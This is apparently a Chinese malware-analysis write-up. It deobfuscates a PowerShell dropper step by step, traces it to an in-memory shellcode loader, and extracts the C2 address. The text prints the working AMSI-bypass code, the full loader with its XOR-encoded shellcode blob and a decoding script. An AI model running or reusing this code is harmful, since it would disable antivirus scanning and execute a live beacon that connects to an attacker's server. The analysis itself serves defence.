AAQEgX2teZVxjJVx','sAAAFyFyAiIm8bFzJrZWxmOiVcW2ZaVmlYbRsXa2MkF28bFzInFzQXbxsfF2l','xrWF5cY1w7W1xrWlxjXVxJHh9cZFhFcGNZZFxqajglZWZga1pcY11cSSVkXGtqcEoXa1pcYVlGJG5cRR8fcGNZZFxqajh','vUUFBaiJCOyhuK05sR0pCbE','GRYRWNYYFpcZ0pLSR4fa','2VcaWlsOjExVGVgWGRmO2dnOF','5YYz1lZmBrWGtlXGRcY2dkQGtcSiUgamlca1xkWGlYZ1ZpWG0bFyNcZ3BrVmVpbGtcaVZpWG0bFyMeY1hsa2','pYYzoeFyMeXGdwS1xrWF5','saUsbFzQXcG','HmpbZl9rXERcbWBrWEVcXVhqZUwlKSplYE4la11mamZp','TT1jSW5vXklJQS','fW2Zfa1xEa1w+JWpbZl9r','bEQlZFxranBKUhcjHmpqWGM6ZmtsOBcjampYYzpgamU4FyNbXGNYXEoXI1pgY1lsRxcjam','tqcEpSAAEgJytvJxcjJycnKm8nFyNfa15lXEMlXFtmWlZpWG0bFyNmaVxRMTFUa','RDknOEdmKE1CW01LPltiSjtiOUlFZydJRDlMS2','XGRWXG1ga1hlVlxdWGplbFZpWG0bHxcjIGlrR2tlQBdrWlxhWUYkblxFHx9dXElcY','2hpb09CQUU/K15sTixobGQwWmFJOylfWmRgPU9aZUZcPGFqTFpoQ19ZLmloWG9Db1hgaS1YK2c9cClxWywvaEJbUUJk','taXGFZRiRuXEUfVF1cSVxjW2VYPyVqXFpgbWlcSmdmaVxrZUAlXGRga2VsSSVkXGtqcEpSHzcX','cY1w7cEQeH1xncEtcZWBdXDslIFxqY1hdGxcjHlxjbFtmRHBpZm','bZlpW','Gtl','A/FyNaYGNZbEceFyMeXGJmbWVAHh9bZl9rXERcZWBdXDslaVxbY2BsWVZcZ3BrVmlYbRsAASAeW1xeWGVYRBcjXGRga2VsSR4fal5YYz1lZm','tG1RUUlxrcDlSAAFyFyAvF2hcJBdccWBqMTFUaWtHa2VAUh8XXUABAXQBIB9cZ3BLXGtYXGk6JWlcW','1xiZm1lQCVcZGVsaVZpWG0bAAEgICBUW2BmTVIfFyBUaWtHa2VAUh83F1xncGtWXGtYXlxjXFtWa1xeVlplbF0fFyNpXF1dbFlWaVhtGx9','BrWGtlXGRcY2dkQGtcSiUgamlca1xkWGlYZ1ZpWG0bFyNbaVhbZVhrSjExVGplZmBrZVxtZWY6XmVgY2NY','RYmdQcUEpWmBnbDxsRWw8bD1tPGlnbDxpUUcqY','WZrWmxpa2plZjpcZWBdXDslaVxbY2BsWVZcZ3BrVmlYbRsAASBUXGtYXlxjXDtralhaYGtj','AXQBIGZpXFE','pXGtlYGZHZWZga1plbD1pZj1ca1heXGNcO2tcPjExVGNYX2ppWEQlalxaYG1pXE','OiVlZmBrWlxjXVxJJWRca2pwSlIXIx5aYGNZbEcXI15gSnA5XFtgPxcjX','Zca1heXGNcW1ZrXF5WWmVsXR8XIyBaZmNjOGNYbGtpYE0XY2NbJSkqY1xlaVxiF2pqXGlbW1hWWmZpZ1ZrXF5WWmVsXR8faVxrZWBmR2VmYGtaZWw9','SBlbEkxMVRqalxaWjhpXFtjYGw5cGNZZFxqajgla2BkPCVlZmBrWlxjXVxJJWRca2pwSlIXIyAgHl','ubEBeXW1wOWdOKGoqP','TxbWnBaQSxMbVlDXzxhZUlKL0libWk4Oi8','z5jamopWklfLVg7PD9oaWtLWmZsKUhvXy1YPj1tPGlNZVpvRWVQcEEpQGFEcC1DRzBvXmwpKh4fXmVgaWtKKy1calg5ZGZpPTExVGtpXG1lZjolZFxranBKUhc0F1xbZlpWaVh','Hh9c','9YaWs/WU1iZVliWz47aEVlUERqSU1EPGNJ','lma1hbZVhEFyMnFzQXZWZga2BqZkcfaVxrXGRYaVhHUgAAAR8XZFhpWEcAAXIXXGdwa1Zca1he','j8vPkBtQWtNO21fK2BAZENoQ2xQR0ZsPGlnbDxsTW1AaWstPWZCZC1abU5bOEdtQGhFblBmXClGaV8tWnFDcFg8WygrZGwpQGFEcGhhYFhMTj06Qi5qY2Y9RW','JIRG5','rZUBSHzcXXGdwa1','dMRm88UEQnYkpGW2','aVhtGxcjaVxdXWxZVmlYbRsXIycXI1xbZlpWaVhtGx9wZ2Y6MTFUY1hfamlYR','RcR','GVAHh9cY2xbZkRaYGRYZXA7XGVgXVw7J','mXQABASAeNEAsSjBlb0BIRF88RWZvPEknbj1IPEk7TVBfPFpxaypaa0QrcUVwQGlEXkFpaypcLkltTWFZQitgaj5BZk5MY09FbGc7','WmA5SkpwQWRaYGdsPGxFcEBwbytkYEFsaGljKkBhRDpqQllHKjxoTVt'))
[Byte[]]${D} =  (  Get-CHiLdITem  ("{3}{2}{1}{0}"-f'0','ABle:539W8','arI','V')).VaLUE::("{0}{3}{1}{2}" -f'FromB','64','String','ase').Invoke(("{4}{2}{7}{5}{1}{9}{0}{8}{3}{6}" -f'xe','la2','YG','CV','amNga0xgamQ4JWVm','ZrbDg','kXGtqcEo=','tYZG','WGVYR','VcZF'))
[Byte[]]${e} =   (GET-VaRiaBlE ("5"+"39W"+"80") -vAlu )::("{0}{3}{1}{4}{2}" -f 'Fr','Base64S','ring','om','t').Invoke(("{4}{5}{1}{2}{3}{0}" -f'g=','9a2','Bl','QGBqZF','W1xjYF','g'))
function o (${V}){
    [Byte[]]${T} = ${V}.("{1}{0}"-f 'ne','clo').Invoke()
    for (${x} = 0; ${x} -lt ${V}."Co`UNT"; ${x}++) {
        ${t}[${V}."CoU`Nt"-${X}-1] = ${V}[${X}] + 3
    }
    return ${T}
}

${Y} = 9while(${y} -gt 6){
    ${C} = &('O')(${C})
    ${D} = .('O')(${d})
    ${E} = &('O')(${e})
    ${y} = ${Y} - 1
}
 (GCi  ("{1}{2}{3}{0}"-f 'gE','va','rIabL','e:7')).vALUE."asse`mb`ly"."GET`TY`pE"(  (GeT-VArIablE ("{1}{0}" -f 'j','X6')).vaLUE::"a`sCIi"."G`ETSt`RING"(${d}))."g`ETFIELD"( ( chiLdITEM ('vAriA'+'BL'+'E:x'+'6j') ).value::"As`ciI"."Ge`TstriNG"(${e}),("{2}{4}{1}{5}{0}{3}"-f 'a',',S','NonPu','tic','blic','t')).("{0}{1}{2}"-f'Set','Val','ue').Invoke(${N`ULl},${t`RUE})
.("{0}{1}"-f'ie','x')( $x6J::"a`sCii"."g`ETstR`iNg"(${C}))

反混淆后，得到：

POWERSHELL

# 1. 绕过 Windows Defender/AMSI (Antimalware Scan Interface)$AmsiType = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
$AmsiField = $AmsiType.GetField('amsiInitFailed', [System.Reflection.BindingFlags]'NonPublic,Static')
$AmsiField.SetValue($null, $true)

# 2. 准备 Payload (变量 $c 的内容)# 下面展示的是解密逻辑，真实 Payload 通常是 Cobalt Strike Beacon 或其他 C2 Agent$PayloadBase64 = "FxqajhjWFlmYz4lVhsXchdrWlxhWUYkXGlcX04Xc..." # (原始代码中很长的那串)$PayloadBytes = [System.Convert]::FromBase64String($PayloadBase64)

# 3. 解密 Payload# 算法：将字节数组反转，并对每个字节值 +9
[Array]::Reverse($PayloadBytes)
for ($i = 0; $i -lt $PayloadBytes.Length; $i++) {
    $PayloadBytes[$i] = $PayloadBytes[$i] + 9
}

# 转换为脚本字符串
$DecodedScript = [System.Text.Encoding]::ASCII.GetString($PayloadBytes)

# 4. 执行恶意代码
Invoke-Expression $DecodedScript

把Base64重新反转、拼接、解密：

POWERSHELL

Set-StrictMode -Version 2

function func_get_proc_address {
        Param ($var_module, $var_procedure)
        $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
        $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
        return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
        Param (
                [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
                [Parameter(Position = 1)] [Type] $var_return_type = [Void]
        )

        $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
        $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
        $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

        return $var_type_builder.CreateType()
}

If ([IntPtr]::size -eq 8) {
        [Byte[]]$var_code = [System.Convert]::FromBase64String('32ugx9PL6yMjI2JyYnNxcnVrEvFGa6hxQ2uocTtrqHEDa6hRc2sslGlpbhLqaxLjjx9CXyEPA2Li6i5iIuLBznFicmuocQOoYR9rIvNFols7KCFWUaijqyMjI2um41dEayLzc6hrO2eoYwNqIvPAdWvc6mKoF6trIvVuEuprEuOPYuLqLmIi4hvDVtJvIG8HK2Ya8lb7e2eoYwdqIvNFYqgva2eoYz9qIvNiqCerayLzYntie316eWJ7YnpieWugzwNicdzDe2J6eWuoMcps3Nzcfkkjap1USk1KTUZXI2J1aqrFb6rSYplvVAUk3PZrEuprEvFuEuNuEupic2JzYpkZdVqE3PbKsCMjI3lrquJim4xyIyNuEupicmJySSBicmKZdKq85dz2yFp4a6riaxLxaqr7bhLqcUsjEeOncXFimch2DRjc9muq5Wug4HNJKXxrqtKZPCMjI0kjS6MQIyNqqsNimicjIyNimVZlvaXc9muq0muq+Wrk49zc3NxuEupxcWKZDiU7WNz2puMspr4iIyNr3Owsp68iIyPIkMrHIiMjy6Hc3NwMQkdOSk0MYExOU0JRRgxwRlFVRlEMVRsMYnNqDGdkbnkVbHtrahcWE3lrIyS/6B56BW6IGqPtjOaJRXTaZBbxeR6DMGOffjuO3q4PV1sRI2JAQEZTVxkDQlNTT0pAQldKTE0MW0tXTk8IW05PDwNCU1NPSkBCV0pMTQxbTk8PA0pOQkRGDAkuKWJAQEZTVw5vQk1EVkJERhkDRk0OQlYuKWJAQEZTVw5mTUBMR0pNRBkDSkdGTVdKV1oPA0BMTlNRRlBQLil2UEZRDmJERk1XGQNuTFlKT09CDBYNEwMLdEpNR0xUUANtdwMVDRIYA3RKTRUXGANbFRcKA2JTU09GdEZBaEpXDBYQFA0QFQMLaGt3bm8PA09KSEYDZEZASEwKA2BLUUxORgwVGg0TDRAXGhQNEhMTA3BCRUJRSgwWEBQNEBUuKSPuW4w1DK+sJJZ88CArvkR8SRnjEhLbvU5JcycdEF3s1WpByvfgIu70VUbxRv4iMu0qfawLh5lMOCNindOWgXXc9msS6pkjI2MjYpsjMyMjYppjIyMjYpl7h3DG3PZrsHBwa6rEa6rSa6r5YpsjAyMjaqraYpkxtarB3PZroOcDpuNXlUWoJGsi4KbjVvR7e3trJgMrIyNz4Mtc3tzcEhYVDREQFw0RExoNEhMQIxn9S5I=')

        for ($x = 0; $x -lt $var_code.Count; $x++) {
                $var_code[$x] = $var_code[$x] -bxor 35
        }

        $var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
        $var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
        [System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

        $var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
        $var_runme.Invoke([IntPtr]::Zero)
}

可以发现此处是一个内存马落地的过程，通过如下流程：

POWERSHELL

# 1. 解码 shellcode
[byte[]]$code = [Convert]::FromBase64String("...")

# 2. XOR 解密
for ($i = 0; $i -lt $code.Length; $i++) {
    $code[$i] = $code[$i] -bxor 35
}

# 3. 获取 VirtualAlloc
$VirtualAlloc = GetProcAddress("kernel32.dll", "VirtualAlloc")

# 4. 申请内存（RWX）
$mem = VirtualAlloc(0, $code.Length, 0x3000, 0x40)

# 5. 写入 shellcode
[Marshal]::Copy($code, 0, $mem, $code.Length)

# 6. 执行 shellcode
$func = (delegate pointing to $mem)
$func.Invoke(0)

那么接下来我们尝试解析内存马。

内存马解析

首先尝试使用Python代码还原内存马为二进制：

PYTHON

import base64

data = "32ugx9PL6yMjI2JyYnNxcnVrEvFGa6hxQ2uocTtrqHEDa6hRc2sslGlpbhLqaxLjjx9CXyEPA2Li6i5iIuLBznFicmuocQOoYR9rIvNFols7KCFWUaijqyMjI2um41dEayLzc6hrO2eoYwNqIvPAdWvc6mKoF6trIvVuEuprEuOPYuLqLmIi4hvDVtJvIG8HK2Ya8lb7e2eoYwdqIvNFYqgva2eoYz9qIvNiqCerayLzYntie316eWJ7YnpieWugzwNicdzDe2J6eWuoMcps3Nzcfkkjap1USk1KTUZXI2J1aqrFb6rSYplvVAUk3PZrEuprEvFuEuNuEupic2JzYpkZdVqE3PbKsCMjI3lrquJim4xyIyNuEupicmJySSBicmKZdKq85dz2yFp4a6riaxLxaqr7bhLqcUsjEeOncXFimch2DRjc9muq5Wug4HNJKXxrqtKZPCMjI0kjS6MQIyNqqsNimicjIyNimVZlvaXc9muq0muq+Wrk49zc3NxuEupxcWKZDiU7WNz2puMspr4iIyNr3Owsp68iIyPIkMrHIiMjy6Hc3NwMQkdOSk0MYExOU0JRRgxwRlFVRlEMVRsMYnNqDGdkbnkVbHtrahcWE3lrIyS/6B56BW6IGqPtjOaJRXTaZBbxeR6DMGOffjuO3q4PV1sRI2JAQEZTVxkDQlNTT0pAQldKTE0MW0tXTk8IW05PDwNCU1NPSkBCV0pMTQxbTk8PA0pOQkRGDAkuKWJAQEZTVw5vQk1EVkJERhkDRk0OQlYuKWJAQEZTVw5mTUBMR0pNRBkDSkdGTVdKV1oPA0BMTlNRRlBQLil2UEZRDmJERk1XGQNuTFlKT09CDBYNEwMLdEpNR0xUUANtdwMVDRIYA3RKTRUXGANbFRcKA2JTU09GdEZBaEpXDBYQFA0QFQMLaGt3bm8PA09KSEYDZEZASEwKA2BLUUxORgwVGg0TDRAXGhQNEhMTA3BCRUJRSgwWEBQNEBUuKSPuW4w1DK+sJJZ88CArvkR8SRnjEhLbvU5JcycdEF3s1WpByvfgIu70VUbxRv4iMu0qfawLh5lMOCNindOWgXXc9msS6pkjI2MjYpsjMyMjYppjIyMjYpl7h3DG3PZrsHBwa6rEa6rSa6r5YpsjAyMjaqraYpkxtarB3PZroOcDpuNXlUWoJGsi4KbjVvR7e3trJgMrIyNz4Mtc3tzcEhYVDREQFw0RExoNEhMQIxn9S5I="
decoded = base64.b64decode(data)
shellcode = bytes([b ^ 35 for b in decoded])

open("shellcode.bin", "wb").write(shellcode)

还原后得到的文件瞬间被Defender查杀：

这下来对了！允许后先分析文件类型，使用DIE打开，未提示类型：

直接使用IDA解码，发现如下IP数据：

经过AI分析，得到以下结果：

项目	值
C2	156.234.209.103
URI	admin/Compare/Server/v8/API/DGMZ6OXHI450ZH
协议	HTTP
通信库	WinInet
数据传输	chunked-like
执行方式	内存执行
sleep	未显式（需 stage2）
jitter	未显式